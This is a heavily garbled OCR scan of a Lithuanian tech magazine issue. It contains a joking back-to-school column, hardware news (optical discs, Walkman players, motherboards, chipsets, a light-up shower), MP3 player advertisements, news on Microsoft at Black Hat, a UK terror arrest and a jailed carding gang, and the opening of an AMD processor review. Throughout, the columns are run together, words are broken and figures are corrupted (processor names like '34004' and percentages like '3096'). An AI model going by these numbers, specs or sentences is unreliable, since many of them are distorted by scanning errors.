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Nga visiems asocijuojasi IK 
tostogų pabaiga. Kažkam vėl teks eiti i mokyklą, kitiems darba... Dar treti tiesiog konstatuos 


ili orai ir tuoj vėl teks nuo fotelio pasiimti jau tris mėnesius ten gulinti megztuka 
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nis: kompiuterio laikrodis. Spragtelk du kartus ant laikrodžio ir nustatyk tarkim... hm ) 

eng. Ta pati padaryk su mobiliuoju telefonu ir sieninia 7 |() O 
nsn ur su savimi nešiokis Iš rūsio parsitemptus ir nuo makulatūros punkto 
birželio mėnesio laikraščius (to mėnesio Hakeri tikrai tu eškok po pagalve arba 

nusipirk iš makulatūros punkto kuo daugiau senu laikraščių ir išmėtyk įvos I || () 2 4 

Lia Misvė tavo sUMmanUYmU mokiniai gali aprūpinti mokytoju pašto dėžutes " . ) 

tiso ir direktoriaus pašto dėžutę ir 1. 


nąsnis: paskambink keliems geriausiems draugams ir paklausk, ka įie veiks „Šia liepa? a V; 
įk liepos pradžioje, kai bus ilgasis savaitgalis lėkti prie įūros. Nekreipk dėmesio į kvailus - “ 


iškas Gorgl? p 1 


mitu jokių priemon Kas dristu iš korto posiduoti? Ieškomi 10 


opa 


lis; įsimink vieno tiesa 1akeris sugeba apgauti kompiuterines sistemas ir technika, bet kom- * K? 


technika neapgauna Žmogaus. Ir vasara visgi baigias 
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„VERBATIM“ PRISTATO „MINI 
DVD+R DL“ DISKUS 


Optiniai diskai nepaliaujamai 
tobulėja. Auga jų darbo greičiai 
bei telpančios informacijos 
kiekiai. Kompanija „Verbatim“ 
mums pristato diskus Mini 
DVD+R DL, kurių skersmuo yra 
8 cm, duomenų talpa — 2,6 
Gb (apie valanda vaizdo). Bi- 
joti neverta: jie visiškai atitinka 
DVD+R DL standartą, kurį pat- 
virtino DVD+RW Alliance, ir yra 
suderinami su visais šį formatą 
pripažistančiais kaupikliais. 
Kad tavo duomenų gigabaitai 
nebūtų pažeisti, disko paviršius padengtas specialiu apsauginiu 
Scratch Guard sluoksniu, kuris, pasak gamintojų, diskus padaro 
40 kartų atsparesnius pažeidimams. Derėtų paminėti, jog šie diskai 
turėjo būti pradėti pardavinėti vasaros pradžioje kartu su vaizdo 
kameromis, kurios gali dirbti su šiais diskais. 


IR VĖL „WALKMAN“ 


Kompanija „Sony“ savo gerbėjus vėl pradžiugino naujo Walkman grotuvų 
modelio išleidimu. Šiandien pasikeitimai palietė E seriją: naujieji modeliai 
vadinasi NW-E002, NW-E002F, NWE-003, NW-E003 ir NW-E005. 
Pagrindinė jų ypatybė — greito pakrovimo sistema, kuri grotuvui sutei- 
kia galimybę dirbti ilgiau nei parą, atkuriant ATRAC3, WMA ir MP3 
formatais įrašytą muziką. Beje, naujųjų grotuvų talpa svyruoja nuo 512 
Mb iki 1 Gb, o komplekte patogiam muzikos valdymui 
ir jos perkėlimui iš kitų kaupiklių pateikiama 
programa SonicStage. Jeigu tau staiga 
atsibos grotuve įrašyta muzika, tave 
išgelbės įmontuotas radijo imtuvas. 
Korpusas pagamintas iš polikar- 
bonato, yra šeši jo nuspalvinimo 
variantai. „Sony“ taip pat planuoja 
išleisti daugybę šiam įrenginiui skirtų 
aksesuarų. 


ATEIČIAI SKIRTA | 
SISTEMINĖ PLOKŠTĖ 


Nors kol kas AMD Socket AM2 tipo procesoriai yra retenybė, su 
jais suderintų sisteminių plokščių banga toliau auga. Šiandien 
kompanija „Foxconn“ paskelbė apie tai, kad jos naujiena — plokštė 
C51XEM2AA — gali dirbti su AMD Socket AM2. Plokštė naudoja 
NVIDIA nForce 590 SLI mikroschemą, kuri jai suteikia galimybę 
dirbti su dviejų kanalų DDR2-800 atmintimi. Plokštėje taip pat yra 
du PCI-E x16, vienas PCI-E x4, vienas PCI-E x1 ir du įprastiniai PCI 
lizdai. Be to, joje yra 6 RAID palaikančios SATA II jungtys. Taip pat 
derėtų paminėti garso HDA adapterį ir dvi įmontuotas gigabitines 
tinklo plokštes. Entuziastai tikrai įvertins maitinimo ir reset myg- 
tukus bei klaidų identifikavimo sistemą, sudarytą iš garsiakalbio ir 
dviejų šviesios diodų. Taigi laukiame naujųjų procesorių! 


CHROMUOTA VIA 


Kompanija VIA išleido nauja mikroschema su įmontuotu grafiniu 
branduoliu Chrome9, kuris yra paruoštas darbui su būsima op- 
eracine sistema Windows Vista. Naujoji mikroschema dirba su 
naujausiais procesoriaiss /ntel Core Duo, DDR2 667 atmintimi ir 
PCI Express magistralėmis. įmontuotas GPU Chrome9 yra suderi- 
namas su DirectX9, atpažįsta 2.0 versijos šeiderius, skirtingus 
HDTV formatus (su skiriamąja geba iki 1920x1080) bei firminę 
technologiją VIA Chromotion, kuri leidžia pagerinti vaizdo kokybę. 
V-link magistralė gali šią mikroschemą susieti su bet Kuriuo pi- 
etiniu VIA tiltu, pavyzdžiui, su VIA VT8251, kuriame įmontuotas 
VIA Vinyl kodekas (8 kanalai, HD garsas, 32 bitų/192 kHz). Po 
tokių VIA naujovių gamintojai turi galimybę kurti ganėtinai įvairias ir 
įdomias sistemines plokštes. Taigi naująjį nVidia ir VIA mikroschemų 
priešpriešos etapą galime laikyti prasidėjusiu! 


HARDNEWS A 


ELITINIS ŠVIESOS DUŠAS 


Amerikiečių kompanija „Interbath“ jau trisdešimt metų dirba su 
liukso klasės dušo sistemomis. Galų gale ji nusprendė išleisti 
šviečiantį elektroninį dušą (ELS — Electronic Light Shower). Be 
elektronikos dušų serija (tegu man bus atleista už tokį grubų 
posakį!) taip pat gali pasigirti tikrais Svarovskio kristalais. Jeigu 
ne tie kristalai, ELS būtų labai panaši į operacinės lempą. Sis- 
tema veikia taip: pagal jūsų pasirinkimą vandens čiurkšlės arba 
nepaliaujamai keičia spalvas, arba jus apšviečia ir prausia jūsų 
mėgstama spalva. Rinktis galima iš žalios, geltonos ir mėlynos. 
Deja, raudonos nėra. Tai susiję su tuo, jog po dažno prausimosi 
raudoname duše gali pakrikti nervukai :). Tiesa, norint matyti, 
kaip šis stebuklas šviečia, dušo kabinoje reikia išjungti šviesą. 
Šviesa iki vandens eina per optikos pluošto kabelį, prijungtą prie 
dėžutės, kurioje sumontuotos halogeninės lempos ir besisu- 
kantis ratas su skirtingais lęšiais. Principas paprastas, tačiau 
kažkodėl niekas anksčiau nepagalvojo jo panaudoti būtent duše. 
Dušo galvutėje yra 270 skylučių. Prie kiekvienos skylutės eina 
atskira apie 1 milimet- 
ro skersmens optikos 
skaidula. Taip išeina, 
kad iš vienos pusės į 
ELS galvutę keliauja 
kabelis su šviesa, 0 iš 
kitos — per įprastinę 
žarną teka vanduo. „Gy- 
dykite nervus vandens 
spinduliuose“, — štai 
ką siūlo „Interbath“. 
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„LOGITECH“ RINKINYS TRILYPIS MUZIKOS LAPAS 


tech“ išleido naujas ausines su mikrofonu, kurios vadinasi PC 
Headset 120 ir puikiai tinka skambinant iš kompiuterio į kompiuterį, 
bendraujant balsu internete, rėkiant ant ginklo bičiulių tinklo p 
Himuose bei, savaime suprantama, įdarbinant jas pagal tikrąją 
kirti, Ly. kaip įprastas ausines. Ausinės sujungtos patogiu lankeliu 
reet-style, per kaklą), todėl jas užsidėjęs tu tuojau pat apie jas 
rši — nesijaučia jokio nepatogumo. Pačių ausinių atkuriamų 
Į diapazonas — 20-20000 Hz, mikrofono - 100—-10000 Hz. 
1belio ilgis — 2 m. Jeigu tu ši įrenginį 
r laikai nereikalingu, tai žinok, 
balso perdavimo intemete pop- 
mas nuolat auga. Pavyzdžiui, 
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Acme MP3 Player A218 | 79 Lt 

"ama Šiame vieamemnasovij cme ayer A223 | 149 Lt 
ima Skype visame pasaulyje | gig Ž Acme Mp3 Player A | 

lojasi jau daugiau nei 250 Acme Mp3 Player A298 | 189 Lt 
nų ŽMonNiŲ. www.acmemedia.lt 


HITECHNEWS A Muzika, muzika, muzika... 


Muzikiniai vakarai, muzi- 
LAIKRODIS BURIUOTOJAMS 


kiniai realybės šou ir... 
Rankinis laikrodis... Atrodytų, paprastas ir visiems prieinamas da- "—- i ai 
lykas. Tačiau labai norint net iš rankinio laikrodžio galima padaryti iki šiol cašiejam U 
tokį įrenginį, kad po to įssiriuėų kam jis toks sb Taigi du MP3 grot uvų lenty "ž 
visame pasaul arsūs laikrodži minimo šviesuoliai — Zana i 5 
" a Rušenė I Viani Vakšr S adkbaio i parcuotuvje siangos! net 
5 "mes nežiūrėti, kad nesusinervintum 
peprasią vedini, laikrodį. Šio išoriškai kasos aparatą primenančio nori, bet negali, nes jie brangiai kainuoja, — tai dabar Acme Tau 
on nio si R sa en leidžia mėgautis nešiojama muzika visur, kur tik būsi. A218 mod 
dintas: Čabastan - Ni ind i i masis Gia elis supranta MP3 ir WMA formato dainas, jo duomenų laikmenoje 
au skirta upinių laivų pritraukimui prie ss asiaai, aids telpa iki 256 MB informacijos. Diktofonas, 6 ekvalaizeriai, dainu 
iškėlimui ir panašiems dalykams. Tiesa, laikrodis išoriškai primena tekstų suderinamumas ir mėlyno galinio apšvietimo LCD ekranas 
dvi gerves, kurios viena su kita sujungtos pavaromis. Riušonė sako sukuria tikra harmoniją. Ziūrim, ką turim antrasis gražuolis 
jog kuriant Cabestan įkvėpimo ieškojo jūrinėje tematikoje. Iš čia r naujoje Aame: MES gidano Uaujale: pavadiniss (2 vanų, 
- 4 “ ž k Dvigubai didesnė talpa (512 MB), FM radijas, diktofonas ir net 
Jūrinė grandinė bei tam tikras chronometro panašumas į UE 7 ekvalaizeriai. Toks pat puikus LCD ekranas ir ne ką prastesnis 
įrenginį. Šis laikrodis iš tiesų jūrinis a Ra ne galima narcyt I suderinamumas su bet kokiu Kompiuteriu. Ir paskutinis, tačiau 
30 metrų. Bet tai ne paskutinis pakvaišusių laikrodžių gamintojų rinos Xi o iz asi 
> 5 : 2 4 Ž tikrai ne prasčiausias — atvirkščiai, mūsų nuomone, šis modelis 
os. Žanas Fransua sugalvojo Kurt tnlogiją: Monaco V4 konceptas — pats geriausias iš šio trejeto. Susipažink — A298 modelio 
įkūnijo žemę ir automobilį, Cabestan — jūrą ir laivus, O trečiasis, - 
dar tik kuriamas laikrodis, bus skirtas orui ir aviacijai. 


vidinėje atmintyje telpa 512 MB dainų, be to, talpą galima 
padidinti iki neriboto kiekio (naudojant micro MMC atminties 
korteles). 2 ausinių lizdai muzikos vienu metu leidžia klausytis 
dviem žmonėms — labai romantiškas Acme žingsnis. Diktofonas, 
FM radijas su įrašymu, 7 ekvalaizeriai, OLED ekranas (geltonas 
arba žalias), įkraunama baterija ir visų mylimi MP3 bei WMA for- 
matai. Taigi belieka juos atskirti pirmais antrais išsiskaičiuot! 
A218 yra labai ryškios spalvos ir pailgas; A223 — apvalus ir 
suspaustas; A298 slepiasi po juodu drabužiu su išlenkta balta 
linija. Sugebėjai surasti? 
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EKRANAI: NUO 2D PRIE 3D 


Gali būti, jog artimiausiu metu mobiliuosiuose telefonuose ir 
ne tik juose atsiras trimačiai ekranai. „Samsung SDI“ pristatė 
sėkmingą naująją technologiją, leidžiančią praktiškai bet kurių 
įrenginių ekranuose atkurti erdvinius vaizdus. Gudriųjų korėjiečių 
technologijos pagrindas plokšti skydeliai su aktyvia matrica 
iš organinių šviesos diodų (AMOLED — active matrix organic Ii- 
got-emitting diode). Tai nėra keista, kadangi „Samsung“ yra LED 
ekranų kūrimo lyderis. Kompanija jau anonsavo 4,3“ AMOLED 
ekraną, kuris užtikrina didžiausią veikimo greitį ir geriausią erdvinio 
vaizdo skiriamąją gebą lyginant su jau egzistuojančiais 3D ekranais. 
Tačiau „Samsung“ sustoti neplanuoja. Šiuo metu kompanija toliau 
dirba prie šios technologijos, kad ją būtų galima naudoti ne tik mo- 
biliuosiuose telefonuose, bet ir nešiojamuosiuose kompiuteriuose 
bei televizoriuose. Pagal „Samsung“ prognozes, per artimiausius 
dešimt metų didžioji ekranų dalis turės erdvinio vaizdo atkūrimo 
funkciją, o 2010 metais 3D ekranų paklausa išaugs dvigubai. 
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„MICROSOFT“ DALINASI 
PASLAPTIMIS SU HAKERIAIS 


Ar tu gali įsivaizduoti situacija, kuomet dėdulės iš „Microsoft“ patys 
iteina pas hakerius ir pasakoja jiems apie langinių apsaugos sub 
tlybes? Mano vaizduotei tai nesuvokiama. O štai patys „Microsoft“ 
irbantys dėdulės tame nemato nieko ypatingo, todėl jie nusprendė 
sudalyvauti hakerių konferencijoje Black Hat, kuri turėtų įvykti jau grei- 
tai. Beje, mažaminkščiai ruošiasi ne šiaip sau dalyvauti, o perskaityti 
elis pranešimus apie artėjančios Vistos apsaugos metodus, skirtingas 
funkcionalumo ypatybes ir panašius dalykus. Iš viso per vieną dieną 
Microsoft“ specialistai planuoja padaryti 5 vienas už kitą atviresnius 
pristatymus. Taigi į Black Hat papuolę piktieji hakeriai apie naujosios 
JS apsaugos mechanizmus galės sužinoti dar prieš jos išleidimą ir iš 
anksto sukurti savo nulaužimo technikas. „Koks tokios keistos elg; 
senos motwas?“ — gali paklausti. Pasak „Microsoft“ atstovų, toki 
žingsnį lėmė Kompanijos politika, kurią galima išsakyti keletu žodžių: 
Mūsų sistema saugiausia iš visų!“. Realų šio saugumo lygį jie siūlo 
ustatyti nepriklausomiems specialistams, t.y. hakeriams. 
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KVANTINIAI EKRANAI — 
„SENA“ NAUJIENA 


Kaip tu jau žinai, plokšti ir net lankstūs ekranai pasaulinėje 
elektroninės technikos rinkoje jau ne Tačiau 
šiuolaikiniai LCD ir OLED ekranai negali užtikrinti pakankamo 
ryškumo ir kontrastingumo, o tie, kurie gali, kainuoja brangiai. 
Dėl šios priežasties įvairios kompanijos ieško naujų produktų, 
kurie galėtų už santykinai žemą kaina vartotojui pasiūlyti 
lankstų ekraną su aukštu kontrastingumu ir didele greitaveika. 
Taigi šia proga buvo „reanimuota“ ekranų kvantinių 
(guantum dot) technologija. Kvantiniai taškai 
nanokristalai, kurie elgiasi kaip vienas atskiras atomas. Pirmąjį 
tokio ekrano prototipą sukūrė amerikiečių kompanija „OD Vi 
sion's“ tai buvo viso labo 32x64 taškų dydžio monochrominė 
juostelė. Bet, nepaisant mažų prototipo gabaritų, kompanijos 
atstovas Ko-Salivanas tikina, kad po 
sukonstruotas „kvantinio ekrano“ prototipas, kurio skiriamoji 
geba nenusileidžia šiuolaikiniams HDTV. Be didelio ryškumo 
ir kontrastingumo (vaizdą ekrane bus galima matyti net ir 
ryškioje saulės šviesoje) įrenginys vartos mažiau energijos, 
nei šiuolaikiniai analogiški LCD televizoriai. Naujaji ekraną taip 
pat bus galima lenkti praktiškai bet kuria kryptimi. Ekranas 
iš kvantinių taškų taip pat gali atvaizduoti kur kas daugiau 
matomo spektro spalvų, nei bet kuris kitas OLED arba LCD 
ekranas. Kaip sako Salivanas, 0D-LED ekrano atvaizduojamų 
spalvų kiekis gali būti 3096 didesnis, nei šiuolaikiniuose CRT 
ekranuose. Energija pavyko sumažinti dėl to, kad neveikian 
tys taškai nenaudoja energijos, kai tuo metu LCD ekranuose 
galinis apšvietimas veikia visą laiką, nepaisant to, kiek taškų 
šiuo metu yra blokuojama. Vienam fotonui sukurti O0D-LED 
ekrane sunaudojama viso labo 50 elektronų, kas šviesą 


naujiena. 


taškų 


tai specialus 


keleto Mėnesių bus 


tašku 


išspinduliuojančiam įrenginiui yra nedaug. Kvantinių 
ekranuose taip pat nereikia galinio apšvietimo, 
galima sukonstruoti LCD ekrano. 
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OPERACIJA „MOZAR“ 


Praėjusį mėnesį Didžiojoje 
Britanijoje buvo įvykdyta 
antiteroristinė operacija 
„Mozar“, po kurios buvo 
areštuota 30 Žmonių. 
Viskas prasidėjo nuo 

to, kad britų specialio- 

sios tarnybos pradėjo 
stebėti įtariamų ryšiais 

su teroristais žmonių ele- 
ktronines ryšio priemo- 

nes. Policija periminėjo jų 
susirašinėjimą ir blokavo 
kanalus, kuriais ji būdavo p 
gaunama. Iš gautos in- 
formacijos paaiškėjo, kad vaikinai turėjo negerų ketinimų, o 
konkrečiau — susprogdinti parlamento pastatą Otavoje. Tai pat- 
virtino ir per susirašinėjimą vartotas tuomet dar gyvo pogrindinės 
Irako teroristų grupės lyderio Abu Musabos Al--Zarkavio vardas. 
Specialiosios tarnybos iš pradžių areštavo 17 susirašinėjime 
dalyvavusių žmonių, o per juos buvo suimti ir likusieji. Didžioji 
sulaikytųjų dalis pasirodė esą teroristų užverbuoti per internetą. 
Barzdotieji Alacho tarnai savo armijos papildymui jau seniai nau- 
doja šiuolaikines technologijas. Taigi jeigu tu į savo elektroninio 
pašto dėžutę gausi laišką nuo kokio nors Mohamedo bin Ladeno, 
geriau jį iš karto pašalink — toliau nuo nuodėmės. 


NUOSP MENĖ KARDERIAMS 


Karderių pasaulyje yra žmonių, kurie vagia 
po truputį ir nepritraukia ypatingo demesio, 
tačiau yra ir tokių, kurie bando pinigėlius 
grėbti grėbliais, todėl anksčiau ar vėliau 
atsiduria 3x3 dydžio kameroje. Būtent 
pastarajai kategorijai galima priskirti ii 
piliečio iš Odesos Artūro Liašenkos gauja 
kuri beveik tris metus terorizavo vargšus 
vakariečius. Pagrindinė jų veikla buvo 
suklastotų kreditinių kortelių gamyba ir 
realizavimas, o informacijos apie realių 
aitų numerius gavimu užsiiminėjo kiti žmonės. Bet kuris pagei- 
aujantysis pas juos galėjo nusipirkti kortelę su nedaug dolerių 
ž 100-150 amerikietiškų prezidentų, o rimtesni klientai imdavo 
sditines korteles su rimtesnėmis sumomis ir už tai paklodavo 
5090, Karderiai net turėjo savo svetainę, iš kur jie realizuo- 
) pagrindinę savo suklastotų kortelių dalį. Suimant Liašenką 
kompaniją dalyvavo tiek Vidaus reikalų ministerijos pajėgos, 
r specialiosios tarnybos (Interpolas, FTB) Juk jų padaryti 
ostoliai buvo vertinami beveik 90 milijonų doleriu. Kaip juos 
atskiro straipsnio tema. Pasakysiu tik tiek, kad suimant 
1ą Ju pagrindiniame bute buvo surasta 80 tūkstančiu korteliu, 
ose buvo Milijonai dolerių. Visai neseniai teismas vaikinams 
kelbė nuosprendį: gaujos vadas buvo nuteistas 6 metams 
usves atėmimo bendrojo režimo kalėjime, o likę grupės nariai 
uo 5 metų lygtinai iki 5 metų už grotų. 


a£avo — 
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HARDNEWS A 


KOVA TIK PRASIDEDA 
MSI P610 | 2 Lt 


Kai daugelis MP3 rinkos analitikų skuba reziumuoti, jog iPodas 
atrėmė visus pasikėsinimus į jo sostą, mes ryžtamės teigti ką 
kita MSI palaukė, kol kiti iPodo konkurentai jį nuvargins 
ir dabar griebiasi mirtino ginklo. Ginklo markė — P610. Tai 
toliašaudė MP3 artilerija, kurios šoviniai yra ne tik įprasti muzikinių 
failų formatai, bet ir vaizdo sviediniai. Taip, šiame gražuolyje su 
1 GB talpos vidine atmintimi telpa ir vaizdo, ir garso failai. Spal- 
votas 1,8 colio įstrižainės 128 x 160 LCD ekranas skirtas ne tik 
sužinoti informacija apie grojančią dainą — M-Jpeg ir nuotraukos 
čia taip pat laukiamos. Diktofono Kokybė labai padori, 0 papll- 
doma teksto peržiūrėjimo funkcija leidžia keliaujant skaityti el. 
knygas. Pridėkime įkraunamą ličio jonų bateriją, kuri ve ikia iki 
14 val. klausantis muzikos ir iki 4 val. žiūrint nuotraukas, ir 
turėsime labai rimtą iPodo konkurentą. Jei manai, 
klystame, pabandyk tai įrodyti — į kiekvieną Tavo pastebėjimą 
mes atsakysime taip pat: „O kokia to Taviškio kaina?“ Vargu 
ar yra geresnis kainos, kokybės ir galių santykis... 


kad Mes 


MINTIS SKAITANTI 
MECHANINE RANKA 


Atėjo toks laikas, kai robotai gali skaityti tavo mintis, tačiau tai padaryti 
buvo nepaprasta. Minčių skaitymo sistemos pagrindas — funkcionalus 
magnetinis rezonansinis realaus laiko smegenų veiklos aktyvumo 
skeneris (fMRI). Šis fantastiškas įrenginys sujungtas su pakankamai 
lanksčiu mechaniniu rankos protezu. Be abejo, tai Kur kas šauniau, 
nei mintimis valdyti ekrane lakstantį kursorių. Tu tik įsivaizduok: pagal 
kraujo tekėjimą galvos smegenų induose fMRI sudaro smegenų akty- 
vumo vaizda ir, remdamasis daugybe šablonų, isako rankai užimti tam 
tikrą padėtį. Sugalvojai parodyti pirštais o'key ženklą — mechaniniai 
pirštai patys suformuoja puikiai pažįstamą vaizdelį. Keista, tiesa? 
Labiausiai šis įrenginys pravers neįgaliesiems, kuriems, tiesą sakant, 
Jis ir buvo kuriamas. 
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1Byte GA-K8NF-9, nForce4 


24, PC3200(400Mhzi Patriot (PSD1G400) 
Seagate rracuda, J 
US EN6600GT HTD, PCI-E 
RW- 1608P 
V: 350, AcBel (API4PC 


Motir plokštė: GigaByte GA K8NE nForce4 
Aušin AMD BOX 
Atmintis, : 1024, PC3200(400Mhzi Patriot (PSD1G400) 
rracuda, 7200rpm 
S EN6600G T HTD, PCI-E 
1608P 
šaltinis I (API4PC28) 


Brangūs akmenys / AMD 


[Intro] 
Si medžiaga bus naudinga visų pirma tiems, kas jau iš anksto apsisprendė dėl savo būsimo kompiuteri 
formos ir kas labiau yra linkęs pirmenybę teikti kompanijos AMD gaminamiems procesoriams. Mes til 

ga padės tau ne tik susipažinti su rinkoje siūlomais procesoriais, bet ir sužinoti technologines š 


Jalybes. 


[Ekonominis aspektas| 

Iš pradžių atkreipkime dėmesį į AMD procesorių kainų pokyčio dinamiką. Visai įmanoma, jog tu pastebėjai, kaip 
smarkiai pabrango AMD konkurento Intel gaminami „akmenukai“, todėl suabejojai pastarosios procesorių pasir 
nkimo išmintingumu. Pamėginkime išaiškinti susidariusią situaciją. Esame pripratę, kad dėl technologijos plėtojin 
procesorių kainos turi kristi. Atsiranda naujų, šiuolaikiškesnių, brangesnių ir galingesnių sprendimų. Atitinkamai 
ankstesnės kartos geležies kainos krenta. Tačiau visai neseniai vaizdas smarkiai pasikeitė. Pernai iki pat liepos 
pabaigos AMD Ath'on 64 serijos procesorių kainos nuolat krito. Tačiau nuo praėjusių metų rudens Iki šių Metų 
asario pabaigos AMD procesorių kainos išaugo 50-60*6. Susidariusi padėtis gali būti paaiškinta tik didžiule Athlon 
64 serijos procesorių paklausa. Dėl to susidarė nebrangių AMD procesorių deficitas. Maža to, AMD susidūrė su kita 


problema: silicio plokščių pabrangimu vidinėje rinkoje. Tik šiuo metu kainos nukrito, situacija maždaug stabiliz 
todėl priežasčių nerimauti nėra. Dabar protinga rinktis būtent AMD procesorius — be abejo, kol vėl nenutiko 
nors anomalija, dėl kurios smarkiai išaugtų kainos. 


[Technologijos] 
Mūsų teste pristatyti trijų tipu procesoriai: AMD Athlon 64 X2, AMD Athlon 64 ir AMD Sempron, 


paaiškinti skirtumus tarp šiu „akmenų“ tipų. Sempron procesoriai neiekiiorti labiausiai prieinamai kainų kati 


gorijai. Jie išsiskiria nedideliu antro lygio Kešu priklausomai nuo procesoriaus tipo, jo apimtis yra 128 arba 
256 Kb. Šie „akmenukai“ gaminami 754 soketui, tačiau neseniai pasirodė brangesni 939 lizdui skirti variantai 
Savaime suprantama, pastarasis pirkėjui atsieis brangiau, tačiau estetai liks patenkinti. Sempron procesoriai 
sukurti su Palermo branduoliu, todėl jie panašūs į seniai žinomus Athlon XP su - keista p esoriaus I 
apskaičiavimo formule. O AMD Athlon 64 inžinieriai kūrė rimčiau. L2 kešo dydžiė Ab lausomai nuo modelio, 
padidinti iki 512 ir 1024 Kb. Iš ankstesnių „akmenukų“ jie išsiskiria patobulinta 64 bitu arc “ itektūra, kuri le 
vykdyti tiek 32, tiek ir 64 bitų aplikacijas. Jie taip pat pasižymi tokiomis plačiai žinomomis 

kaip Cool'n'Ouiet ir HyperTransport. Čia pagrinde naudojami San Diego (galingesniuose proc r 

branduoliai. Kita procesorių klasė — AMD Athlon 64 X2, nors iš tiesu tai yra du į viena kristalą ntegruot 

oriai. Iš to išplaukia, jog toks CPU duoda dviguba našuma, ypač daugiaužduotiniame režime. Deja, už ta 


pasiruošti atsisveikinti su padoria pinigėlių suma. 

[Testavimo metodika| 

Testavimui buvo naudotas standartinis programų rinkinys. Be sintetinio testo 

įdarbinti WinRaf ir SuperPI. Vietoje žaidimo buvo — ktas tarp viso pasaulio žaidėjų la 

2. Tuo pačiu jo skiriamoji geba buvo sumažinta iki minimumo (640x480), kad rezultate 

priklausytų nuo procesoriaus pajėgumo. Be to, su palei 1 Gordian Knot buvo apdorojamas V 

DivX 5.11 kodeku) bei į MP3 formata su Lame kodeku buvo konvertuojama garso byla. Spartinimo 

atliekami tokiais atvejais standartine metodika: palengva didinamas FSB dažnis bei reguliuojama pateikiama 
įtampa siekiant gauti maksimalų ir tuo pačiu stabilų rezultata. 


AMD Sempron 3000 + 
Veikimo dažnis, GHz: 1,8 
L2 kešas, Kb: 128 
Technologija, mkm:; 0,13 
Branduolys; Palermo 
Magistralės dažnis; 1600 
Lizdas; 754 Socket 

Mūsų apžvalgą pradėsimė nuo 
paties jauniausio AMD Sem 


pron procesorių SsOrios modelio. 
Turedamas solidų 1,8 GHz dažnį, 
šis mažylis gali rimtai konkuruoti 
su egžistuojančiais biudžetiniais 
sprendimais. Mažas kešas šiam 
įrenginiui netrukdo parodyti gerų 
rezultatų, kuriuos galima Matyt 
Lok žaidimuose, tiek 1r kitose 
programose, Be to, Palermo bran 
duolio Ir Socket 754 platformos 
galimybės daro savo, todėl tų 
pačių AMD Athlon XP procesorių 
tonė aptaramas „akmenukas“ 
atrodo šauniai. Labai mažas šio 
procesoriaus kešas (128 Kb) — tai 
dar pusė bėdos. Įvertinus tai, kad 
AMD planuoja galutinai atsikratyti 
0,13 mkm procesorių gamybos, 0 
Sempron procesoriai taip pat nebus 
išimtis, Mūsų nuomone, čia palan 
kau atrodo AMD Athlon 64 šeimos 
„akmenukai“, Kurė yra ne tik našūs 
1r funkcionalūs, bet ir nesmarkiai 
skinasi savo kaina paimkime 
kad 1 tą palį AMD Athlon 64 
3000 +, kurio kaina nuo aptanamo 
Sempron 3000+ modelio skiriasi 
vos keliomis „žaliųjų prezidentų“ 
dešimtimis, 


AMD Sempron 31004 
Veikimo dažnis, GHz: 1,8 
L2 kešas, Kb: 256 
Technologija, mkm: 0,13 
Branduolys: Palermo 
Magistralės dažnis: 1600 
Lizdas: 754 Socket 


Išstudiaves technines savybės tu 
gali įsitulinti, jog šis „akmenukas“ 
nelabai skirtas! NUO prieš Lv aptarto 
AMD Sempron 3000+ mod 
elyje 3100+ Inžinieriai viso labo 
dvigubai padidino antrojo lygio 
kešą. Šis procesorius atpažįsta 
visas Imanomas technologijas: 
1A-32, 3Dnow, enhanced 3Dn0w, 
SSE, SSE2 ir MMX. AMD Sempron 
3100+, kaip 1 preš tai aptartas 
modelis, gali dirbti su technologija 
Coal'n'Oujet bei antivirusine apsau 
ga, kurią suteikia NX bitas. 31004 
yra praktiškai jauniausias Sempron 
serijos modelis, todel jj galima gerai 
paspartinti, taigi spartintojai čia Ukrai 
turės ką veikti. 

Deja, dėl su Socket 754 dibančios 
platformos ypatybių atmintues 
valdiklis yra procesoriuje, 0 nė 
mikroschemoje. Taigi gali pamiršti 
apie atminties darbą dviejų kanalų 
režimu, 


AMD Sempron 33004 
Veikimo dažnis, GHz: 2 
L2 kešas, Kb: 128 
Technologija, mkm: 0,09 
Branduolys: Palermo 
Magistralės dažnis; 1600 
Lizdas: 754 Socket 


Sis procesonus dar venas Mūsų 


testė dalyvaujanus Sempron sen 
105 atstovas. Motininių plokščių 
gamintojai kaip reikiant pasiruošė 
o renginio išleidimui, Juk būtent 
Sempron 3300+ dėl savo didelio 
daugiklio (10.00 Iendžia E stepingo 
Palermo branduoli paspartinti dau 
giau nei 2,6 GHz. Esmė tame, jog 
daugeds ii 10! parduodamų motininių 
plokščių su Socket 754 jungtimi 
negali pasigrti garantuotų 300MHZ 
eilės dažnio taktinio generatoriaus 
darbu. Toks didelis daugikis pašalina 
šia problemą, kadangi norint pasiekti 
2,6 GHz dažni, tam pačiam Sermpron 
3300+ magistralės dažnį reikės 
paspartinti iki „viso labo“ 260 MHz. 
Taigi sparlintojams su kukliomis 
finansinėmis galimybėmis š40 įrenginio 
galimybės yra neįkainojamos. 

Antro lygo kešo apimtis negailestingai 
sumažinta iki 128 Kb, todėl šis „ak 
menukas“ negali pasigjru ypatingai 
dideliu našumu. Žaidimų platformors 
Sempron 3300 + akivaizdžiai netinka, 
0 1 biudžetinės sistemas diegti tokį 
„akmenuką“ brangoka, 
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AMD Sempron 34004 
Veikimo dažnis, GHz; 2 
L2 kešas, Kb: 256 
Technologija, mkm; 0,09 
Branduolys: Palermo 
Magistralės dažnis; 1600 
Lizdas: 754 Socket 


Pastaruoju mėtų veržijai auga Ser 
pron Markės procesorių asorumėn 
las, kuris pasipildė nauju modeliu 
AMD Sempros 3400+. Tolų žinias 


žengti kompaniją AMD paskatinusios 


priežastys kio pulkiausiai supran 
tamos. AMD Sempron procesoriai 
suteikia naują gyvenimą Socket 
754 1 galimybę pagaliau šgabentu 
15 sandėlių pasenusias Motininės 
plokštes, Šis įrenginys, lyginant su 
ankstesniu Sempron serijos modeliu 
(3300+1, turi didesnės apimtues 
antro lygio kešą — 256 Kb prieš 128 
Kb. Tačiau KR architektūra labiau 
Išlošia ne nuo kėšo apimties, 0 nuo 
taktinio dažmio padidinimo, Iš čia 1 
toks pavadinimo reitingo „pliusų“ 
skirtumas, Procesoriai čia skinasi 
viso labo 100 vienetų (skirtumas 
tarp senesnių modelių buvo 200 
„pliusų“). Naujovės visada kerta 
per vartotojo kišenę. Štai ir dabar 
gamintojas neskuba mažinti naujos, 
tačiau tuo pat Metu pasenusios 
įrangos kainos. 


AMD Athlon 64 30004 
Veikimo dažnis, GHz: 1,8 
L2 kešas, Kb: 512 
Technologija, mkm: 0,09 
Branduolys: Venice 
Magistralės dažnis: 2000 
Lizdas: 939 Socket 


Darau prielaida, kad AMD Athlon 64 
